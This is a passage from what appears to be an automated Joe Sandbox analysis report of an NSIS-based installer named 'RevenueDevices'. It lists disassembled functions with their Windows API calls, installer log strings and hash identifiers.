                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                          Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 3581403547-784952888
                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                          • API String ID: 1641139501-220328614
                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                          Strings
                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID: created uninstaller: %d, "%s"
                                          • API String ID: 3294113728-3145124454
                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                          Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3734993849-2769509956
                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                          Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                          • GetSysColor.USER32(?), ref: 00403E2B
                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                          • DeleteObject.GDI32(?), ref: 00403E55
                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                          Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                          Strings
                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                          • API String ID: 1033533793-945480824
                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                          Strings
                                          • Exec: command="%s", xrefs: 00402241
                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                          • Exec: success ("%s"), xrefs: 00402263
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                          • API String ID: 2014279497-3433828417
                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                          Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                          • GetMessagePos.USER32 ref: 00404871
                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                          • MulDiv.KERNEL32(00014200,00000064,?), ref: 00403295
                                          • wsprintfW.USER32 ref: 004032A5
                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040329F
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                          Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                          • wsprintfW.USER32 ref: 00404457
                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$@rD
                                          • API String ID: 3540041739-1813061909
                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                          Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":
                                          • API String ID: 589700163-165019052
                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
